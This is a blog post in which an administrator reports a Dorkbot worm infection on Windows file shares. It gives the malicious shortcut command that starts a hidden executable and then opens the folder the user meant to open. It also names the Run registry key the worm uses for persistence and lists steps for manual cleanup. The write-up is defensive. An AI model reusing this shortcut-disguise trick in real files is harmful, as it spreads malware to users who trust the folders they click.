nethack

Today i have a nice one… OK, maybe not THAT nice, as you can expect from the title.

This morning i recognized that folders on network shares looked different than they should. After connecting to the file server it was almost clear instantly. A virus…

For normal users (with default file explorer settings) it looked almost as usual. But, after i configured it to show hidden and operating system files i saw that all folder were hidden, and instead of the folder, a shortcut to the original folder was created.
(Unfortunately  i don’t have a screen shot of it at home, should have one in the office which i will add tomorrow)

Looking at the properties of a shortcut, i saw this command executed when someone double-clicks it:

%WINDIR%\system32\cmd.exe /c "start %CD%snkb0ptz\snkb0ptz.exe && %WINDIR%\explorer.exe %CD%Data"

What is it doing? Before it shows the user the directory he thinks he has opened, it executes the “snkb0ptz.exe” executable. Not 100% clear what it is doing. It looks like it copies the fie to the users “Application Data” directory (f.ex. C:\Documents and Settings\<User>\Application Data\) named with a random file name like “Wjiblccqrkluktrq.exe”.

Additional to that, it adds two registry entries:
– HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
– HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

The first looks like it is there to restart the exe again after a login. The second, i think, is not directly relevant and an internal  Windows thing.

Thats what i know so far. If it may starts a key logger, connects to an external server is not clear yet. Waiting for a response from our Antivirus vendor.

Neither Sophos nor Avira was able to detect it. A sample was sent to Sophos labs this morning, and this afternoon i received the message that they have created a new pattern to detect it. It’s called “W32/Dorkbot-ER”:

Update (2013-04-03 08:15)

Sophos added some informations about the virus: http://bit.ly/XWOimy

1. autorun.inf on the root is also created and should be removed
2. They have a list of DNS requests it is doing Unfortunately no info about what is sent to these addresses.

Update (2013-04-03 11:15)

Just recognized that the hidden folder also have the “Read-only (Only applies to files in folder)” flag set. Simply add “-r” to the attrib command to remove it too.

Clean it up manually

Looks like it is possible to clean it up manually. A bit of work, but works:

1. Make sure all tasks named like “Wjiblccqrkluktrq.exe” are stopped
2. Look through all “Application Data” directories of users and search for these exe files (note the exact names!)
3. Search through the registry and delete all references to this exe
4. Delete all shortcuts on the drives, “autorun.inf” and the “snkb0ptz” folder
   Depending on what shares you have, you may have these shortcuts and snkb0ptz on multiple places. You can use windows search to find them all
5. To make the original folders visible agian, you have to execute this command for each directory, which removes the hidden flag:
   attrib -s -h -r <FolderName>